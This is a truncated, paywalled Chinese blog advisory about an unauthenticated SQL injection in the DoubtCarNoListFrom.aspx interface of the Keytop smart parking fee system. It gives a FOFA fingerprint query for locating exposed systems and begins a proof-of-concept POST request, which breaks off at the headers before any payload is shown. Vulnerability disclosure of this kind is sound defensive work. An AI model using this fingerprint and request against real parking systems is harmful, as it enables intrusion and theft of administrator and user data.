该专栏为热销专栏榜 第68名
超级会员免费看
本文介绍了科拓全智能停车收费系统中DoubtCarNoListFrom.aspx接口存在的SQL注入漏洞,该漏洞允许未认证的攻击者通过SQL注入获取敏感数据,甚至可能获得服务器系统权限。复现环境和PoC被提供,并建议通过限制接口访问权限来修复此问题。
0x01 产品简介
科拓全智能停车收费系统是科拓股份针对商业业态停车场提供的停车收费管理解决方案,结合车牌视频识别技术和移动支付技术,为商业停车场提供具有突出优势的“智能硬件+管理平台+应用系统”一站式解决方案,能够切实满足商业业态停车场运营管理的特定需求。
0x02 漏洞概述
科拓全智能停车收费系统 DoubtCarNoListFrom.aspx 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
0x03 复现环境
FOFA:body="/KT_Css/qd_defaul.css"
0x04 漏洞复现
PoC
POST /KT_Admin/CarCard/DoubtCarNoListFrom.aspx HTTP/1.1
Host: your-up
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encodi
订阅专栏 解锁全文
681
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
